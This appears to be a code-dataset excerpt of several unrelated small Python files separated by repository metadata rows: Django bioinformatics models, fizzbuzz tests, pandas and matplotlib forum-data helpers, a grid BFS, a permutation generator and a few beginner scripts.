    located on one DNAPiece."""
    #reference to a piece of DNA in the cell (DNAPiece-type object) (.ptt file) on which this system is located
    dnapiece = models.ForeignKey(DNAPiece)
    # e.g. MRS means that there is M, R and S subunit exactly in this order on the DNA
    subunit_composition = models.CharField(max_length=70)
    # G_G_M lists families to which each subunit was classified
    family_composition = models.CharField(max_length=70)
    # e.g. MG_SG_RA means subunit M from family G, subunit S from G, R from family A.
    subunit_family_composition = models.CharField(max_length=140)
    # This is result of our 'inner classification'. If system had 1 M 1R and 1 or more S
    # and all the subunits belonged to the same family it was automatically classified into this family
    system_kind = models.CharField(max_length=10)
    # Human-readable name of the system (purpose not documented -- TODO confirm).
    real_name = models.CharField(max_length=20)
    def __unicode__(self):
        # NOTE: __unicode__ implies Python 2 / old Django; __str__ is the
        # Python 3 equivalent.
        return ('System number: ' + str(self.id)
                + ' Composed of: ' + self.subunit_composition
                + ' subunits that belong to family ' + self.family_composition
                #it's a bit redundant:
                #+ ' respectively, you can write it as: ' + self.subunit_family_composition
                + '. System classified as: ' + self.system_kind
                #use self.ForeignKey.AnotherForeignKey.attribute
                +' It is in: ' + self.dnapiece.genome.name
                +' on: ' + self.dnapiece.name)
class Protein(models.Model):
    """One protein (gene product) belonging to a System, with its location,
    subunit classification and external annotation results."""
    #reference to a system (System-type object) that this protein belongs to
    system = models.ForeignKey(System)
    # e.g. 1234567 ->GI
    gene_id = models.CharField(unique=True, max_length=20)
    # e.g.1456...2345 position on the DNA strand (from .ptt file)
    genome_location = models.CharField(max_length=30)
    # e.g. + -> the DNA strand (plus or minus)
    strand = models.CharField(max_length=5)
    # e.g. 14 number of bp between the gene and previous gene in this system
    # 0 for start of the system
    margin_left = models.IntegerField()
    #<System>->first protein of the system or 2 or more subunits
    #<middle> in the middle of the system
    #</System> last protein of the system
    #<Solitary> -> M R or S but not in any of the systems
    #<not> It is not M , R or S subunit
    system_part = models.CharField(max_length=20)
    #Family as defined by clans (only 'most confident' proteins attributed to clusters)
    clans_cluster = models.CharField(max_length=5) # not present in the 'all' table
    #Family as assigned by HMMer
    hammer_cluster = models.CharField(max_length=5)
    # M for methyltransferase
    # R for restrictase
    # S for specificity subunit
    # for proteins that are not M R or S
    subunit_kind = models.CharField(max_length=5)
    # length of the protein in bp
    dna_length = models.IntegerField()
    #amino acid sequence of this protein
    aa_sequence = models.TextField()
    # HHpred/HMMer search results against Pfam.
    hh_pfam_id = models.CharField(max_length=10)
    hh_pfam_short_desc = models.CharField(max_length=40)
    hh_probability = models.DecimalField(max_digits=5, decimal_places=2)
    hh_e_value = models.CharField(max_length=10)
    hh_pfam_desc = models.TextField()
    # Probabilities from Alberta's data
    m_probability = models.IntegerField() # from the Wilno (Vilnius) dataset -- TODO confirm source
    r_probability = models.IntegerField() # from the Wilno (Vilnius) dataset -- TODO confirm source
    s_probability = models.IntegerField() # from the Wilno (Vilnius) dataset -- TODO confirm source
    def __unicode__(self):
        # Omit the 'subunit kind' label entirely when the kind is unknown.
        s_kind = ', subunit kind: '
        if self.subunit_kind == '':
            s_kind = ''
        return ('Gene id: ' + self.gene_id + ', located on ' + self.system.dnapiece.name
                + ' in ' + self.system.dnapiece.genome.name + ', system part: '
                + self.system_part + s_kind + self.subunit_kind + ' ' + self.hh_pfam_short_desc)
| true |
4403d5fd6eb14684c13678dd48677274caaddf53 | Python | AdelkaPa/pytest_travis_demo | /test_fizzbuzz.py | UTF-8 | 888 | 3.125 | 3 | [] | no_license | from fizzbuzz import fizzbuzz
import pytest
def test_fb_is_callable():
    # Smoke test: fizzbuzz accepts an int without raising.
    fizzbuzz(1)
def test_fb_returns_str():
    # Contract: fizzbuzz always returns a string, even for plain numbers.
    assert isinstance(fizzbuzz(1), str)
@pytest.mark.parametrize('num', [1, 2, 4])
def test_fb_regular_is_self(num):
    # Numbers divisible by neither 3 nor 5 come back as their own digits.
    assert int(fizzbuzz(num)) == num
@pytest.mark.parametrize('num', [3, 6, 9])
def test_fb_regular_is_fizz(num):
    # Multiples of 3 (but not of 5) map to 'fizz'.
    assert fizzbuzz(num) == 'fizz'
@pytest.mark.parametrize('num', [5, 20, 50])
def test_fb_regular_is_buzz(num):
    # Multiples of 5 (but not of 3) map to 'buzz'.
    assert fizzbuzz(num) == 'buzz'
@pytest.mark.parametrize('num', [15, 30, 3000])
def test_fb_regular_is_fizzbuzz(num):
    # Multiples of both 3 and 5 map to 'fizzbuzz'.
    assert fizzbuzz(num) == 'fizzbuzz'
def test_fb_raises_typerror_on_str():
    # String input must raise TypeError.
    # NOTE: 'typerror' is a typo for 'typeerror'; left unchanged because test
    # names can be referenced in pytest selection expressions.
    with pytest.raises(TypeError):
        fizzbuzz("")
@pytest.mark.parametrize('num', [ "", 1.5, [], 4+3j])
def test_fb_raises_typeerror_on_non_int(num):
    # Any non-int input must raise TypeError.
    # Renamed: this function was also called 'test_fb_regular_is_fizzbuzz',
    # which redefined -- and therefore silently disabled -- the happy-path
    # test of the same name defined above.
    with pytest.raises(TypeError):
        fizzbuzz(num)
| true |
# NOTE: the original file was C-style pseudo-code (&&, i++, missing colons)
# and was not valid Python.  This is a runnable reconstruction of its evident
# intent: rearrange the numbers so that, wherever the counts allow, the value
# at every index shares the index's parity -- i.e. (i + arr[i]) % 2 == 0,
# which is exactly the condition the pseudo-code tested.
def rearrange_by_index_parity(arr):
    """Rearrange *arr* in place so element parity matches index parity where
    possible; even indices prefer even values, odd indices odd values.
    Returns *arr* for convenience."""
    evens = [v for v in arr if v % 2 == 0]
    odds = [v for v in arr if v % 2 != 0]
    for idx in range(len(arr)):
        preferred = evens if idx % 2 == 0 else odds
        fallback = odds if idx % 2 == 0 else evens
        # Fall back to the other pool once the preferred parity runs out.
        arr[idx] = preferred.pop(0) if preferred else fallback.pop(0)
    return arr

if __name__ == '__main__':
    # Read whitespace-separated integers, rearrange, and display the result.
    numbers = [int(tok) for tok in input("enter the number ").split()]
    rearrange_by_index_parity(numbers)
    print(" display the sorted number in index")
    print(numbers)
| true |
cda8ef9e8c58850232ec3faa99884e7bc7c21380 | Python | dvir88/finewoodworking-datascience-python | /datasetHandler.py | UTF-8 | 4,270 | 3.34375 | 3 | [] | no_license | import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import os
import seaborn as sns
"""
Pandas
"""
def save_post_dataset(data):
    """Append *data* (a dict of columns) to finewood_articles.csv in the
    current directory, writing the header row only when the file does not
    exist yet."""
    frame = pd.DataFrame.from_dict(data)
    file_exists = os.path.exists('./finewood_articles.csv')
    if file_exists:
        frame.to_csv('finewood_articles.csv', mode='a', index=False, header=False)
    else:
        frame.to_csv('finewood_articles.csv', mode='w', index=False, header=True)
# based on the word, we want to get the most popular/frequent question in a category
def get_most_popular_question_category(df, category, word):
    """Return the rows of *df* in *category* whose question text contains *word*.

    The search word is lowercased before matching, so the 'Questions' column
    is assumed to be stored lowercase (mixed-case text would be missed) --
    TODO confirm against the scraper.  Note str.contains treats *word* as a
    regex, so regex metacharacters in the word would be interpreted.

    Fix: the original made a full ``df.copy()`` and immediately discarded it;
    the dead copy is removed (the returned .loc slice is unchanged).
    """
    mask = (df['Category'] == category) & (df['Questions'].str.contains(word.lower()))
    return df.loc[mask]
def most_popular_category_in_order(df):
    """Counts of the (up to five) most frequent categories, re-sorted by
    category name rather than by count."""
    counts = df.copy()['Category'].value_counts()
    return counts.nlargest().sort_index()
# most popular article will include most replies in the most popular category
def get_most_popular_article(df):
    """Row(s) with the overall maximum 'Replies' inside one top category.

    NOTE(review): most_popular_category_in_order sorts its top-5 result
    alphabetically, so ``index[0]`` is the alphabetically-first of the top
    categories, not necessarily the single most popular one -- behaviour
    kept as-is, confirm it is intended.
    """
    working = df.copy()
    top_categories = most_popular_category_in_order(df)
    top_cat = top_categories.index[0]
    return working.loc[(df['Category'] == top_cat) & (df['Replies'] == df['Replies'].max())]
def get_all_month_articles(df, month):
    """Return (a copy of) every article row whose 'Month' equals *month*."""
    matches = df['Month'] == month
    return df.copy().loc[matches]
def get_all_year_articles(df, year):
    """Return (a copy of) every article row whose 'Year' equals *year*."""
    matches = df['Year'] == year
    return df.copy().loc[matches]
# the way you define the most questions in a given period or month in a year is the year and month count
def get_most_replies_in_month_year(df):
    """Rows carrying the global maximum of 'Replies', restricted to the year
    with the most articles.

    Side effect (kept for parity with the original): prints the busiest year.
    """
    busiest_year = df['Year'].value_counts().idxmax()
    print(busiest_year)
    working = df.copy()
    return working.loc[(df['Year'] == busiest_year) & (df['Replies'] == df['Replies'].max())]
def get_questions_count_each_year(df):
    """Number of articles per year, most frequent year first."""
    return df.copy()['Year'].value_counts()
"""
Matplotlib
"""
# One graph will be about the number of questions in each year (bar chart and pie)
# Two graph will be about the number of replies in every month for a specific year (bar chart and pie)
# Three graph will be about the number of questions based on the given word (bar chart)
# Four graph will be a plot of all the categories(plot) based on year(x) and the number of replies(y)
def bar_questions_each_year(df):
    """Show a bar chart of article counts per year."""
    counts = get_questions_count_each_year(df)
    counts.plot(x=counts.index, y=counts.values, kind='bar')
    plt.show()
def pie_questions_each_year(df):
    """Show a pie chart of article counts per year."""
    counts = get_questions_count_each_year(df)
    counts.plot(x=counts.index, y=counts.values, kind='pie')
    plt.show()
def bar_replies_each_month_year(df, year):
    """Show a bar chart of article counts per month within *year*."""
    months = get_all_year_articles(df, year)['Month'].value_counts()
    months.plot(x=months.index, y=months.values, kind='bar')
    plt.show()
def pie_replies_each_month_year(df, year):
    """Show a pie chart of article counts per month within *year*."""
    months = get_all_year_articles(df, year)['Month'].value_counts()
    months.plot(x=months.index, y=months.values, kind='pie')
    plt.show()
def bar_questions_based_on_words(df, category, words):
    """Bar chart: for each word, how many questions in *category* mention it."""
    counts = [len(get_most_popular_question_category(df, category, w))
              for w in words]
    plt.figure(figsize=(10, 5))
    # One maroon bar per word.
    plt.bar(words, counts, color='maroon', width=0.4)
    plt.xlabel("Topics")
    plt.ylabel("Count Topics")
    plt.title("Number of times the words showed up")
    plt.show()
def create_colors_plot(df):
    """Return a copy of *df* with a numeric 'Color' column (one colour value
    per category, evenly spread over [0, 1]).

    Bug fix: the original exclusion filter used ``x != A or x != B``, which
    is a tautology (always True), so nothing was ever excluded.  The intended
    categories are now really excluded, and their rows are dropped so every
    remaining row can be assigned a colour (the original would have raised
    KeyError for excluded categories had the filter worked).
    """
    excluded = ('Gary Ragowski', 'Hand Tools')
    df_copy = df.copy()
    df_copy = df_copy[~df_copy['Category'].isin(excluded)]
    categories = np.unique(df_copy['Category'])
    colors = np.linspace(0, 1, len(categories))
    colordict = dict(zip(categories, colors))
    df_copy["Color"] = df_copy['Category'].apply(lambda x: colordict[x])
    return df_copy
def plot_categories_per_year(df):
    """Scatter plot of Replies vs Year, one hue per category.

    Bug fix: the original referenced a global ``categories`` that was never
    defined at module level (it was a local of create_colors_plot), raising
    NameError at runtime; the hue order is now derived from the dataframe.
    """
    df_copy = create_colors_plot(df)
    categories = list(np.unique(df_copy['Category']))
    fg = sns.FacetGrid(data=df_copy, hue='Category', hue_order=categories, aspect=3.61, height=6.61)
    fg.map(plt.scatter, 'Year', 'Replies').add_legend()
    # sns.scatterplot(data=df_copy,x='Year',y='Replies', c=df_copy['Color'])
    plt.show()
8bcd6b7bc7029b05079f30f490dcad9b6f00ba55 | Python | begibeggineta/Gso_Git | /git_gso.py | UTF-8 | 328 | 3.046875 | 3 | [] | no_license | #Bergþór Ingi Birgirsson
#GSÖ2
#25.1.2017
# Ask for the target file name (prompt is Icelandic: "choose what the txt file should be named").
Text = input("veldu hvað txt skjalið á að heita")
F = open(Text+".txt","w+")
F.write("Hello my honey Hello my baby hello my night time gaaal")
F.close()
# NOTE(review): "+w" re-opens in write mode and TRUNCATES the file, so the
# greeting written above is discarded -- confirm whether append mode ("a")
# was intended instead.
F = open(Text+".txt","+w")
# Prompt is Icelandic: "What do you want to write into the text file?"
innhald = input("Hvað viltu skrifa inn í texta skjalið")
# Write the user's line three times, one per line.
for i in range(0,3):
    F.write(innhald +"\n")
F.close()
e5b500b79a6a44bb7e4d9673246e6db83248f962 | Python | 1082sqnatc/missionspacelab2019 | /testdaynight.py | UTF-8 | 676 | 2.546875 | 3 | [
"Apache-2.0",
"LicenseRef-scancode-proprietary-license"
] | permissive | #!/usr/bin/python3
import time
from os import listdir
from src.dayornight import isDay
#def take_picture():
# print("pic taken")
# TODO main executable file, pulls in cadets' libraries from lib fold
def main():
    """Run the day/night classifier over every file in ../Sample_Data/."""
    sample_dir = "../Sample_Data/"
    for fname in listdir(sample_dir):
        # Progress notification (no space between the word and the file name,
        # matching the original console output).
        print("Processing" + fname)
        image_path = sample_dir + fname
        result = isDay(image_path)  # return value currently unused
# Now process a folder of image...
if __name__ == '__main__':
    # Entry point when executed as a script.
    main()
| true |
7f094780c5e0c8b9beb3a899f5e611ec8177a987 | Python | fengpenghui/proj01 | /qytang/news.py | UTF-8 | 186 | 2.671875 | 3 | [] | no_license | #! /usr/bin/env python3
# coding: utf-8
# github: https://github.com/fengpenghui
# 码云: https://gitee.com/fengpenghui0923
# Read one word and move its first letter to the end, behind a dash,
# followed by 'y' (e.g. 'pig' -> 'ig-py').
word = input()
transformed = word[1:] + '-' + word[0] + 'y'
print(transformed)
| true |
a148cb061a71cd74fa737e79d0a0895c9b3c34a3 | Python | ShuNayak/LeetCode | /ZombieSearch.py | UTF-8 | 1,045 | 3.28125 | 3 | [] | no_license | from typing import List
import collections
class Solution:
    """Grid infection ('rotting oranges'-style) breadth-first search.

    Cells: 0 = human, 1 = zombie.  Each hour every zombie turns its four
    orthogonal human neighbours into zombies.
    """
    def makeZombie(self, grid: List[List])->int:
        """Return the number of hours until all humans are turned, -1 if the
        grid is empty/None or any human can never be reached."""
        if grid is None or len(grid) == 0:
            return -1
        rows, cols = len(grid), len(grid[0])
        humans = 0
        frontier = collections.deque()
        # Seed the BFS with every initial zombie; count the humans.
        for r in range(rows):
            for c in range(cols):
                if grid[r][c] == 0:
                    humans += 1
                else:
                    frontier.append((r, c))
        elapsed = 0
        # Level-by-level BFS: one while-iteration == one hour.
        while frontier:
            for _ in range(len(frontier)):
                r, c = frontier.popleft()
                for nr, nc in [(r, c + 1), (r, c - 1), (r + 1, c), (r - 1, c)]:
                    if 0 <= nr < rows and 0 <= nc < cols:
                        if grid[nr][nc] == 0:
                            grid[nr][nc] = 1
                            humans -= 1
                            frontier.append((nr, nc))
            elapsed += 1
        # The last level infects nobody new, hence the -1 correction.
        return max(0, elapsed - 1) if humans == 0 else -1
# Quick manual check: this grid is fully infected after 2 hours.
obj = Solution()
print(obj.makeZombie([[0,1,1],[0,1,0],[0,0,0]]))
class Solution(object):
    """LeetCode 46 -- generate all permutations of a list of distinct numbers."""

    def __init__(self):
        # Per-instance state instead of the original class-level mutable
        # attribute ``res``, which was shared by every Solution instance.
        self.res = []
        self.nums = []

    def generate(self, l, travel, left):
        """Backtracking helper: extend the partial permutation *l*.

        travel[i] == 1 marks self.nums[i] as already used; *left* is the
        number of elements still to place.
        """
        if left == 0:
            self.res.append(l)
            return
        for idx in range(len(travel)):
            if travel[idx] == 0:
                travel[idx] = 1
                self.generate(l + [self.nums[idx]], travel, left - 1)
                travel[idx] = 0

    def permute(self, nums):
        """
        :type nums: List[int]
        :rtype: List[List[int]]
        """
        count = len(nums)
        if count == 0:
            return []
        self.nums = nums
        self.res = []
        used = [0] * count
        # Seed the recursion with each element in turn.  (The original also
        # tested ``if travel[idx] == 0`` here, but the flag is always 0 at
        # this level -- the dead check is removed.)
        for idx in range(count):
            used[idx] = 1
            self.generate([nums[idx]], used, count - 1)
            used[idx] = 0
        return self.res
class Human():
    """Minimal demonstration of the @property decorator."""

    def __init__(self):
        # Nothing to initialise; the name is a fixed, read-only property.
        pass

    @property
    def name(self):
        """Read-only name attribute (no setter is defined)."""
        return "Wade"
h = Human()
print(h.name)  # properties are read like plain attributes -> prints 'Wade'
| true |
# Iterative Fibonacci-style sequence starting from 2, 3.
# Fixed: the original used Python-2-only `xrange` and `print a`, so it could
# not run on any supported interpreter; the logic is unchanged and the
# three-statement temp swap is replaced by one tuple assignment.
a = 2
b = 3
for _ in range(29):
    # Original: temp = a; a = b; b = a + temp
    a, b = b, a + b
print(a)